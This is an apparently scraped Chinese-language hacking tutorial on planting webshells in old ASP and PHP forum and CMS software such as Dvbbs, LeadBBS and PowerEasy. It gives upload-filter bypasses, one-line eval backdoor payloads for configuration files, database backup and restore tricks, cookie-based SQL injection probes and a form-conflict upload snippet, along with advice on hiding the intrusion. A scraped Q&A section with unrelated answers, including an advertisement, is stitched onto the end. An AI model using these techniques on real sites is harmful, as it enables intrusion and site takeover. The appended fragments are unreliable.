动网7.1 sql版最新注入漏洞的详细利用以及如何在后台获取webshell
一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!
三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
四、利用后台管理向配置文件写webshell
利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",还有一种方法就是写上cnhacker at 263 dot net"%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马"%><%',保存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp。
五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。
六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单
获得webshell方法如下:
1.寻找形如“.asp?id=xx”类的带参数的URL。
2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。
3.清空浏览器地址栏,输入“javascript:alert(document.cookie="id="+escape("xx"));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用是用Request("id")这种方式获取数据的。
4.重复上面的步骤,将常规SQL注入中的判断语句带入上面的URL:“javascript:alert(document.cookie="id="+escape("xx and 1=1"));”
“javascript:alert(document.cookie="id="+escape("xx and 1=2"));”。
1 上传
说到上传获得webshell,就不得不提大名鼎鼎的动网7.0SP2之前的文件上传漏洞了,那可是连官司方都没能幸免于难的啊!其中的成因吗不太好说,大概地说就是字符截断的问题。我们还是来看看怎么利用吧。这里我们要请出老兵的万能上传工具呢(图76),为什么叫万能上传工具呢?很简单,因为连大名鼎鼎的动网论坛都没有注意到这个严重漏洞,其它许多系统自然也避免不了,所以说这个工具是“万能”的,下面我们找一个没打过SP2补丁的dvbbs,注册一个帐号,登录进去后看有没有禁止上传,如果没有禁止,我们就是提取当前cookies保存起来(怎么提取?又忘了不是,前面不是说过可以用修改cookies浏览器提取吗?)然后在万能上传工具处填好漏洞url,欲上传的文件和cookies等信息(图77),点“上传”,不一会就提示成功了(图78),我们现在来访问这个上传后的文件,看,是不是得到一个shell呢(图79)
当然,并不是所有的系统都能用这个方法上传的。下面我再总结几个常见的上传方法。
1、进入后台直接上传。有些系统对管理员可是十分信任的哦,进了后台只要找到有上传的地方你就可以直接选匹马放上去,绝不会有任意阻拦(图80)。
2、添加上传类型上传。如果不能直接上传,可找找看有没有添加上传类型的地方,有的话添加一个ASP就可以了。当然,有些系统在代码中就限定了不允许上传ASP文件,不要紧,我们可以添加允许上传ASA、CER等文件,然后把.asp的后缀改为ASA或CER上传,一样可用的(图81)。
3、抓包上传。这里就要利用Win2000的一个小漏洞了,如果文件名的结尾是空格或“.“号,那么windows会自动把这个符号“吃”掉。那么,我们就可以添加允许上传“ASP ”文件,注意ASP后有个空格,ASP 可不等于ASP啊,所以代码里的限制就没用了。然后我们来到文件上传界面,选择一个ASP文件,先别上传。我们打开抓包工具Wsock Expert(图82),选择监控IE的上传窗口,然后回到上传界面,点击上传,提示上传失败。预料之中。我们来到Wsock Expert,找到刚才提交的数据包(图83),看到那个mm.asp没有,我们在这个后面加个空格,再用NC提交,成功上传!
4、利用表单冲突上传。用这个方法最典型的就是动力3.51的上传了。我们同样注册一个用户,来到发表文章处。切换到“源代码”模式,输入下面的代码:
<FORM name=form1 onsubmit="return check()" action=upfile_article.asp method=post encType=multipart/form-data><INPUT class=tx1 type=file name=FileName> <INPUT class=tx1 type=file name=FileName><INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit></FORM>
再来到“预览”模式,是不是看到了两个选择上传文件的框却只有一个上传按钮啊(图84)?我们在第一个框处选择一个ASP文件,第二个框处选择一个jpg文件,然后点上传。可能会提示冲突,但我们返回“源代码”模式,就可以看到我们上传后的Webshell地址了。
5、利用代码对文件类型的限制上传。现在许多代码为了安全都限制了上传ASP文件,但一些代码的限制方法实在令我不敢恭维。我见过有些代码的限制方式是一遇到ASP就把它去掉的。那么,我们完全可以添加一个上传类型“ASASPP”,这样一来,在上传过程中代码会把中间为ASP去掉,后缀的自然也就变为ASP的了。
6、利用其它上传工具。老兵的万能工具虽名为万能,但因为有些系统的上传代码与动网的是有差异的,所以这个工具对它就失效了。我这里还收集了别的一上上传利用专用程序。比如去缘雅境的,操作起来也十分简单,相信大家都会用的。
(2)写入过滤不完全,
因为现在许多系统都是可以用FSO功能直接写入其文件的,如果写入文件的过滤不完全,也可以直接往里写个webshell,如动易的conife.asp。这里我要讲的是leadbbs后台友情链接添加处写入webshell,我们来到后台的添加友情链接处,点“新增友情链接”(图85),然后在“网站名称处填上冰方后浪子微型ASP后门式海洋的一句话木马,其它乱填(图86),然后我们用客户端连接,成功了吧!(图87)
除了对文件写入的过滤外,还有对数据库写入的过滤。当我们暴库得知数据库后缀为ASP,但用网际快车能下载时,我们就可以确定这个数据库里不包含ASP语句,那么我们只要找到一个可以写入数据库的地方,写入一句话木马,再用客户端连接,一样可以成功的。
3、后台备分及恢复
说起后台的备分和恢复获取webshell,我可算是颇有研究,也可以说是从这里起步学习技术的,先说说常规的方法吧,一般地,我们就是把一个ASP木马改为gif后缀上传,然后记下上传后的地址,下面,我们来到数据备分页面(图88),在“数据库路径”处填自己刚才上传的文件名,在“备分后路径”处填自己想要种马的地址,注意后缀为ASP(图89),点“备分”后我们就得到了自己想要的webshell。
但是,如果像动力一样不允许定义当前数据库地址呢?一样可以的,我们通过暴库术式后台看到动力的数据库地址,因为ASP的话,我们一样可以把一个ASP木马改为gif的型式,然后上传,现在,我们来到“数据库恢复”页面,看到没有,可以自定义恢复数据库的路径(图90),我们选择我们刚才上传的文件路径,恢复(图91),恢复成功后整个系统是用不了,但我们只须直接访问数据库地址就可以得到webshell了,当然,为了不被别人发现最好还是先把数据库备分好,得到shell后再用shell恢复回去。
上面一般说的方法就是我发表的第一篇文件《利用ACCESS得到webshell一文的补充》,至此,数据备分和恢复的利用似乎完了,其实还没有,还是那个动力系统,如果我们无法得到数据库地址,或者数据是mdb的,出放到了web外,我们不就用不了上面的方法了吗?
别急,再绕个弯子,我们来仔细看看这个动力系统,备分处限制了只能备分当前的数据库,不能备分其它文件,且备分后文件后缀限为ASA,但可以自定义文件名。恢复处只能把数据恢复到当前数据库文件,如果遇上本段开头提的那三种情况,我们把一个shell恢复出来也是没用的。既然不能直接弄出来,我们就老老实实恢复一个比较正常的数据吧。说是比较正常,那是因为这个数据库虽然对系统没有影响,但还是做过一些手脚的。
我们拿一个相同系统的空数据库,把<%nodownload%>表中的内容改为一句话木马(图92),然后再在后台添加允许上传MDB文件,上传。下面到数据恢复处把刚上传的文件恢复回去,这时系统仍是正常运行的。我们重新用默认的用户名admin,密码admin888登录后,再到数据备分的地方,把数据备分出来,然后用客户端连接这个备分的文件就可以了。
对于限制没那么严的动网,我们可以直接备分就行了。虽然7.1中对备分处做了限制(图93),但恢复处可设限制(图94),条件比动力宽松多了。
4、SQL导出。对于有注入点的SQL站点,我们还可以用黑客界中的丐帮帮主——就是那个臭要饭的发明的SQL写入导出大法得到webshell,其原理是在知道网站物理路径的情况下通过往SQL数据库中写入一个带木马的表,再将这个表导出,就得到webshell了。为了不让管理人员发现,我们还要删掉这个新建的表。那个臭要饭的还专门对此写了工叫getwebshell的工具(图95),使用起来也并不复杂,我也就不再说了。
银袁力杜: 我就给大家讲几个常用的webshell获取方法.1 上传说到上传获得webshell,就不得不提大名鼎鼎的动网7.0SP2之前的文件上传漏洞了,那可是连官司方都没能幸免于难的啊!其中的成因吗不太好说,大概地说就是字符截断的问题.我们还是...
嵩县18480553381: SQL漏洞修复 - ?
银袁力杜: 在程序里把单引号去除.一般来说会从参数行取得参数,取得参数值后,首先判断有没有单引号在内,如果有,可以用全角的替换掉再往下执行.
嵩县18480553381: 介绍几种好用的服务器监控软件? - ?
银袁力杜: 监控软件目前市场上比较常用功能齐全的是网络视频管理平台软件,相配的服务器是数字解码服务器、流媒体转发服务器、数字矩阵服务器.当然这几张服务器也有专门对应的软件流媒体转发软件、数字矩阵软件、解码软件.这些软件都是成都视可讯数码科技有限公司专业研发的,经过市场的验证,成熟稳定.
嵩县18480553381: SQL注入漏洞的形成原因 - ?
银袁力杜: 我想来是把一串字符串拼接起来的,顶多就是写个函数把变量中的特殊字符过滤一下.
嵩县18480553381: 如何解决SQL注入漏洞 - ?
银袁力杜: 要防止SQL注入其实不难,你知道原理就可以了.所有的SQL注入都是从用户的输入开始的.如果你对所有用户输入进行了判定和过滤,就可以防止SQL注入了.用户输入有好几种,我就说说常见的吧.文本框、地址栏里***.asp?中?号后e68a...
嵩县18480553381: SQL系统注入漏洞怎么解决?具体就是登录时输入' or 1=1 -- 就会登录成功 - ?
银袁力杜: 你在写登陆程序时不允许用户名与密码输入空格也可以控制一些特殊字符
嵩县18480553381: 检测漏洞有个SQL注入漏洞怎么修复 - ?
银袁力杜: 对输入值进行校验.因为你这里传入的参数id是整型,适合你的,最简单的办法就是在后台先判断下id是否为整数,如果是继续执行,如果不是跳出.这样,你的sql 注入漏洞就修复了.
嵩县18480553381: sql server有哪些 sql注入漏洞 - ?
银袁力杜: SQL注入,这个很早的事情了,流行于ASP时代,主要是由于前台验证不够,后台又没有过滤不安全字符.简单的例子:分别由NameTxt,PwdTxt接受页面输入用户名和密码,然后构造如下sql语句:select * from [User] where userName = '" + ...
嵩县18480553381: SQL存在注入漏洞如何修复? - ?
银袁力杜: 漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误,这个缺陷或错误可以被不法者或者电脑黑客利用.修补漏洞,可以用腾讯电脑管家,修复漏洞,强大智能的漏洞修复工具,全面修复微软系统漏洞和第三方软件漏洞.
嵩县18480553381: 请教南方数据的SQL注入漏洞的修补措施 - ?
银袁力杜: 你用的是SQL注入 说明SQL这方面有漏洞 解决方法如下(1)对于动态构造SQL查询的场合,可以使用下面的技术: 第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义.再来看前面的例子,“...
